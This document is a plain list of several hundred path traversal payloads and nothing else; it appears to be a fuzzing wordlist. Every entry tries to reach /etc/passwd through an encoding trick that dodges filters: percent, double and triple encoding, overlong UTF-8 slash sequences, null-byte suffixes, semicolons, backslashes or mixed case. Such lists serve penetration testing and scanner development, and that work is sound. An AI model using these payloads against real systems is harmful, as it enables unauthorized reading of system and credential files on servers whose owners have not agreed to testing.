..%e0%80%af.%e0%80%af..%e0%80%af.%e0%80%afetc%e0%80%af.%e0%80%afpasswd
..%e0%80%af%e0%80%af..%e0%80%af%e0%80%afetc%e0%80%af%e0%80%afpasswd
.%e0%80%af..%e0%80%af.%e0%80%af..%e0%80%afetc%e0%80%afpasswd
...%e0%80%af.%e0%80%af...%e0%80%af.%e0%80%afetc%e0%80%afpasswd
%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2f%2e%2e%2f%2e%2fetc%2f%2e%2fpasswd
%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afpasswd
..%c0%af.%c0%af..%c0%af.%c0%afetc%c0%af.%c0%afpasswd
..%c0%af%c0%af..%c0%af%c0%afetc%c0%af%c0%afpasswd
%2e%2f%2e%2e%2f%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%25e0%2580%25af%252e%252e%25e0%2580%25afetc%25e0%2580%25afpasswd
%252e%252e%252f%252e%252f%252e%252e%252f%252e%252fetc%252f%252e%252fpasswd
%252e%252e%252e%252f%252e%252f%252e%252e%252e%252f%252e%252fetc%252fpasswd
..%00%e0%80%af..%00%e0%80%afetc%e0%80%afpasswd
%2e.%e0%80%af%2e.%e0%80%afetc%e0%80%afpasswd
.%2e%e0%80%af.%2e%e0%80%afetc%e0%80%afpasswd
..%e0%80%af..%e0%80%afetc%e0%80%afpasswd%2500
..%e0%80%af..%e0%80%afetc%e0%80%afpasswd%00
%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd
.%c0%af..%c0%af.%c0%af..%c0%afetc%c0%afpasswd
...%c0%af.%c0%af...%c0%af.%c0%afetc%c0%afpasswd
..%e0%80%af..%e0%80%afetc%e0%80%afpasswd\x00
%2e.%e0%80%af..%e0%80%afetc%e0%80%afpasswd
%2e%2e%2f%2f%2e%2e%2f%2fetc%2f%2fpasswd
..%e0%80%af..%e0%80%afETC%e0%80%afPASSWD
..%e0%80%af..%e0%80%afEtC%e0%80%afPaSsWd
..;%e0%80%af..;%e0%80%afetc%e0%80%afpasswd
%252e%252f%252e%252e%252f%252e%252f%252e%252e%252fetc%252fpasswd
..%25e0%2580%25af..%25e0%2580%25afetc%25e0%2580%25afpasswd
..%2525e0%252580%2525af..%2525e0%252580%2525afetc%2525e0%252580%2525afpasswd
..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
%2e%2e%00%2f%2e%2e%00%2fetc%2fpasswd
%252e%252e%25c0%25af%252e%252e%25c0%25afetc%25c0%25afpasswd
..%c0%af..%c0%afetc%c0%afpasswd%c1%9cx00
%252e%252e%252f%252f%252e%252e%252f%252fetc%252f%252fpasswd
..%00%c0%af..%00%c0%afetc%c0%afpasswd
..%e0%80%aF..%E0%80%AfEtC%E0%80%AfPaSsWd
..%E0%80%AF..%E0%80%AFETC%E0%80%AFPASSWD
%2e%2e%2f%2e%2e%2fetc%2fpasswd%2500
%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
%2e%2e%2f%2e%2e%2fetc%2fpasswd%5cx00
%2e%2e%2f%2e%2e%2fetc%2fpasswd\x00
%2e.%c0%af%2e.%c0%afetc%c0%afpasswd
.%2e%c0%af.%2e%c0%afetc%c0%afpasswd
%252e%252e%2500%252f%252e%252e%2500%252fetc%252fpasswd
..%c0%af..%c0%afetc%c0%afpasswd%2500
..%c0%af..%c0%afetc%c0%afpasswd%00
%2e.%c0%af..%c0%afetc%c0%afpasswd
%2e.%2f%2f..%2f%2fetc%2f%2fpasswd
%2e.%2f.%2f..%2f.%2fetc%2f.%2fpasswd
%2e%2f..%2f.%2f..%2fetc%2fpasswd
%2e..%2f.%2f...%2f.%2fetc%2fpasswd
..%c0%af..%c0%afetc%c0%afpasswd\x00
%2e%2e%2f%2e%2e%2fEtC%2fPaSsWd
%2e%2e;%2f%2e%2e;%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%2f%2e%2e%2fETC%2fPASSWD
%2e%2e%252f%2e%2e%252fetc%252fpasswd
%2e%2e%252F%2e%2e%252Fetc%252Fpasswd
%2e%2e%2F%2e%2e%2Fetc%2Fpasswd
.%2e%2f.%2e%2fetc%e0%80%afpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500
%252e%252e%252f%252e%252e%252fetc%252fpasswd%252500
..%c0%af..%c0%afETC%c0%afPASSWD
..%c0%af..%c0%afEtC%c0%afPaSsWd
..;%c0%af..;%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9cetc%c1%9cpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%25c0%25af..%25c0%25afetc%25c0%25afpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd\x00
..%2525c0%2525af..%2525c0%2525afetc%2525c0%2525afpasswd
..%252f%252f..%252f%252fetc%252f%252fpasswd
..%252F%252F..%252F%252Fetc%252F%252Fpasswd
..%252f.%252f..%252f.%252fetc%252f.%252fpasswd
..%252F.%252F..%252F.%252Fetc%252F.%252Fpasswd
%2e%2e\%2e%2e\etc\passwd
%2e.%00%2f..%00%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd%2500
%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%2e%2e/%2e%2e/etc/passwd%00
%2e%2e%2f.%2e%2fetc%2fpasswd
%2e%2e%2f%2e.%2fetc%2fpasswd
..%c0%af..%c0%afetc%c0%afpasswd
%2E%2e%2F%2e%2E%2fEtC%2fPaSsWd
..%2e%2f./..%2e%2f./etc/passwd
%2E%2E%2F%2E%2E%2FETC%2FPASSWD
%2e%2e/%2e%2e/etc/passwd\x00
..%2f%2f..%2f%2fetc%2f%2fpasswd
..%2f.%2f..%2f.%2fetc%2f.%2fpasswd
%2e%2e/./%2e%2e/./etc/./passwd
%2e%2e//%2e%2e//etc//passwd
.%2e%2f.%2e%2fetc%c0%afpasswd
%2e%2e%2f..%2fetc%2fpasswd
..%2F%2F..%2F%2Fetc%2F%2Fpasswd
..%2F.%2F..%2F.%2Fetc%2F.%2Fpasswd
%252e%252e;%252f%252e%252e;%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fEtC%252fPaSsWd
..%2f..%2fetc%e0%80%afpasswd
%252e%252e%252f%252e%252e%252fETC%252fPASSWD
.%2e%2e/./.%2e%2e/./etc/passwd
./%2e%2e/./%2e%2e/etc/passwd
%252e%252e%252F%252e%252e%252Fetc%252Fpasswd
%252e%252e%25252f%252e%252e%25252fetc%25252fpasswd
%252e%252e%25252F%252e%252e%25252Fetc%25252Fpasswd
%25252e%25252e%252F%25252e%25252e%252Fetc%252Fpasswd
%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
%2525252e%2525252e%2525252f%2525252e%2525252e%2525252fetc%2525252fpasswd
..%253B%252F..%253B%252Fetc%252Fpasswd
..%2500%252f..%2500%252fetc%252fpasswd
..%252500%252F..%252500%252Fetc%252Fpasswd
.%252f..%252f.%252f..%252fetc%252fpasswd
.%252F..%252F.%252F..%252Fetc%252Fpasswd
...%252f.%252f...%252f.%252fetc%252fpasswd
...%252F.%252F...%252F.%252Fetc%252Fpasswd
%2e.%2f..%2fetc%2fpasswd%2500
%2e.%2f..%2fetc%2fpasswd%00
..%c0%Af..%c0%AfEtC%C0%aFpAsSwD
%2e%2e/%2e%2e/EtC/PaSsWd
%2e%2e/%2e%2e/ETC/PASSWD
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%C0%AF..%C0%AFETC%C0%AFPASSWD
%2e.%2f..%2fetc%2fpasswd\x00
%252e%252e\%252e%252e\etc\passwd
.%2e%2f.%2e%2fetc/passwd%2500
.%2e%2f.%2e%2fetc/passwd%00
..%00%2f..%00%2fetc%2fpasswd
.%2e%2f.%2e%2fetc/passwd\x00
.%2f..%2f.%2f..%2fetc%2fpasswd
...%2f.%2f...%2f.%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
..%00%2F..%00%2Fetc%2Fpasswd
.%2F..%2F.%2F..%2Fetc%2Fpasswd
...%2F.%2F...%2F.%2Fetc%2Fpasswd
..%2f..%2fetc%c0%afpasswd
.%2e%2f/.%2e%2f/etc//passwd
.%2e%2f./.%2e%2f./etc/./passwd
..%252F..%252Fetc%252Fpasswd%255Cx00
..\\..\\etc\\passwd
..%252f..%252fetc%252fpasswd%2500
..%252f..%252fetc%252fpasswd%252500
..%252F..%252Fetc%252Fpasswd%252500
..%252F..%252Fetc%252Fpasswd%25252500
..\.\..\.\etc\.\passwd
./.%2e%2f./.%2e%2fetc/passwd
%252E%252e%252F%252e%252E%252fEtC%252fPaSsWd
%252E%252E%252F%252E%252E%252FETC%252FPASSWD
..%252f..%252fetc%252fpasswd\x00
%2e.%2f..%2fEtC%2fPaSsWd
%2e.;%2f..;%2fetc%2fpasswd
%2e.%2f..%2fETC%2fPASSWD
%2e.%252f..%252fetc%252fpasswd
%2e.%252F..%252Fetc%252Fpasswd
%2e.%2F..%2Fetc%2Fpasswd
..%00\..%00\etc\passwd
..%2f..%2fetc%2fpasswd%2500
..%2F..%2Fetc%2Fpasswd%2500
..%252f..%252fetc%252fpasswd%00
..%252F..%252Fetc%252Fpasswd%00
..%2f..%2fetc%2fpasswd%00
..%2F..%2Fetc%2Fpasswd%00
..%252F..%252Fetc%252Fpasswd%2500
.%2e%2f.%2e%2fEtC/PaSsWd
.%2e%2f.%2e%2fETC/PASSWD
.%2e%2f.%2e%2fetc%2fpasswd
%2e.%2f%2e.%2fetc%2fpasswd
..%2f..%2fetc/passwd%2500
..%252F..%252Fetc%252Fpasswd\x00
..%2f..%2fetc%2fpasswd\x00
..%2F..%2Fetc%2Fpasswd\x00
..%2f..%2fetc/passwd%00
.%2e%252f.%2e%252fetc%252fpasswd
.%2e%252F.%2e%252Fetc%252Fpasswd
%2e.%2f.%2e%2fetc%2fpasswd
.%2e%2F.%2e%2Fetc%2Fpasswd
%2e.%2f..%2fetc%2fpasswd
.%2e%2f.%2e%2fetc%2Fpasswd
%2e.%2F%2e.%2Fetc%2Fpasswd
..%2f..%2fetc/passwd\x00
%2E%2e/%2e%2E/EtC/PaSsWd
%2E%2E/%2E%2E/ETC/PASSWD
%2e.\..\etc\passwd
.%252e%252f.%252e%252fetc%252fpasswd
%252e.%252f%252e.%252fetc%252fpasswd
.%2e%2f.%2e%2fetc/passwd
.%2e%2f.%2e%2fetc\passwd
..%00/..%00/etc/passwd%2500
.\..\.\..\etc\passwd
%25252e.%252F%25252e.%252Fetc%252Fpasswd
.%25252e%252F.%25252e%252Fetc%252Fpasswd
.%25252e%25252f.%25252e%25252fetc%252Fpasswd
...\.\...\.\etc\passwd
..%00/..%00/etc/passwd%00
%252e.%252f..%252fetc%252fpasswd
..\..\etc\passwd%2500
.%2e%00/.%2e%00/etc/passwd
%25252e.%25252f..%25252fetc%25252fpasswd
..\..\etc\passwd%00
..;%252f..;%252fetc%252fpasswd
..%2f/..%2f/etc//passwd
..%00/..%00/etc/passwd\x00
..%252f..%252fEtC%252fPaSsWd
..%252F..%252FEtC%252FPaSsWd
..%255C..%255Cetc%255Cpasswd
..%252f..%252fETC%252fPASSWD
..%252F..%252FETC%252FPASSWD
%2e./%2e./etc/passwd%2500
..%25252f..%25252fetc%252Fpasswd
..%2f./..%2f./etc/./passwd
%2e./%2e./etc/passwd%00
..%25252f..%25252fetc%25252fpasswd
..%25252F..%25252Fetc%25252Fpasswd
.%2e\.%2e\etc\passwd
..%2525252f..%2525252fetc%2525252fpasswd
..%2525252F..%2525252Fetc%2525252Fpasswd
..\..\etc\passwd\x00
%2e./%2e./etc/passwd\x00
%2e.\%2e.\etc\passwd
./..%2f./..%2fetc/passwd
...%2f./...%2f./etc/passwd
.%2e%2f.%2e%2fetc//passwd
.%2e%2f.%2e%2fetc/./passwd
..%252f..%252fetc%252fpasswd
..%252F..%252Fetc%252Fpasswd
..;%2f..;%2fetc%2fpasswd
..%2f..%2fEtC%2fPaSsWd
..%2f..%2fETC%2fPASSWD
..%2f..%2fEtC/PaSsWd
%2e.//%2e.//etc//passwd
%2e././%2e././etc/./passwd
..%2f..%2fETC/PASSWD
..%00//..%00//etc//passwd
..%00/./..%00/./etc/./passwd
.%2e/.%2e/etc/passwd%2500
%2E.%2F..%2fEtC%2fPaSsWd
.%2e/.%2e/etc/passwd%00
%2E.%2F..%2FETC%2FPASSWD
./%2e././%2e./etc/passwd
.%2e././.%2e././etc/passwd
..;%2F..;%2Fetc%2Fpasswd
..%2f..%2fetc%2Fpasswd
./..%00/./..%00/etc/passwd
..%2F..%2FEtC%2FPaSsWd
../.././../.././etc/passwd
...%00/./...%00/./etc/passwd
..%2F..%2FETC%2FPASSWD
..../././..../././etc/passwd
../../etc/passwd%2500%2500
../../etc/passwd%2500%00
../../etc/passwd%00%2500
.%2e/.%2e/etc/passwd\x00
../../etc/passwd%00%00
.%2e%2F.%2E%2fEtC/PaSsWd
..%2f..%2fetc%2fpasswd
..%2f..%2fetc/passwd
..%2f..%2fetc\passwd
.%2E%2F.%2E%2FETC/PASSWD
../../etc/passwd%2500\x00
../../etc/passwd\x00%2500
../../etc/passwd%00\x00
../../etc/passwd\x00%00
%2e./%2e./EtC/PaSsWd
%2e./%2e./ETC/PASSWD
..%00/..%00/EtC/PaSsWd
..%00/..%00/ETC/PASSWD
..%2F..%2Fetc%2Fpasswd
../../etc/passwd\x00\x00
..%2F..%2fEtC%2fPaSsWd
..%252F..%252fEtC%252fPaSsWd
..//..//etc//passwd%2500
.././.././etc/./passwd%2500
..//..//etc//passwd%00
.././.././etc/./passwd%00
..%2f..%2fetc//passwd
..;\..;\etc\passwd
..\..\EtC\PaSsWd
..%2f..%2fetc/./passwd
..\..\ETC\PASSWD
.%2e//.%2e//etc//passwd
.%2e/./.%2e/./etc/./passwd
%2e./%2e./etc/passwd
./.././../etc/passwd%2500
..%00/..%00/etc/passwd
..//..//etc//passwd\x00
..././..././etc/passwd%2500
.././.././etc/./passwd\x00
./.././../etc/passwd%00
..././..././etc/passwd%00
./.%2e/./.%2e/etc/passwd
./.././../etc/passwd\x00
..././..././etc/passwd\x00
..////..////etc////passwd
..//.//..//.//etc//.//passwd
.././/./.././/./etc/.//./passwd
.././././.././././etc/./././passwd
..;/..;/etc/passwd%2500
../../EtC/PaSsWd%2500
..\..\etc\passwd
../../ETC/PASSWD%2500
..;/..;/etc/passwd%00
../../EtC/PaSsWd%00
../../ETC/PASSWD%00
.%2e/.%2e/EtC/PaSsWd
.%2e/.%2e/ETC/PASSWD
.%2e;/.%2e;/etc/passwd
..;/..;/etc/passwd\x00
../../EtC/PaSsWd\x00
../../ETC/PASSWD\x00
..%2F..%2fEtC/PaSsWd
..%2F..%2FETC/PASSWD
.//..//.//..//etc//passwd
...//.//...//.//etc//passwd
././.././././.././etc/./passwd
..././././..././././etc/./passwd
../../etc/passwd%2500
../../etc/passwd%00
./..//./..//etc//passwd
..././/..././/etc//passwd
.%2e/.%2e/etc/passwd
./../././.././etc/./passwd
.../././.../././etc/./passwd
../../etc/passwd\x00
././../././../etc/passwd
./.../././..././etc/passwd
%2E./%2e./EtC/PaSsWd
.%2e/.%2E/EtC/PaSsWd
%2E./%2E./ETC/PASSWD
.%2E/.%2E/ETC/PASSWD
..;//..;//etc//passwd
..;/./..;/./etc/./passwd
..//..//EtC//PaSsWd
..//..//ETC//PASSWD
.././.././EtC/./PaSsWd
.././.././ETC/./PASSWD
./..;/./..;/etc/passwd
./.././../EtC/PaSsWd
...;/./...;/./etc/passwd
./.././../ETC/PASSWD
..././..././EtC/PaSsWd
..././..././ETC/PASSWD
../../ETC/PASSWD\X00
..;/..;/EtC/PaSsWd
..;/..;/ETC/PASSWD
..//..//etc//passwd
.././.././etc/./passwd
./.././../etc/passwd
..././..././etc/passwd
..//..//EtC//pAsSwD
..;/..;/etc/passwd
../../etc/passwd
../../EtC/PaSsWd
../../ETC/PASSWD
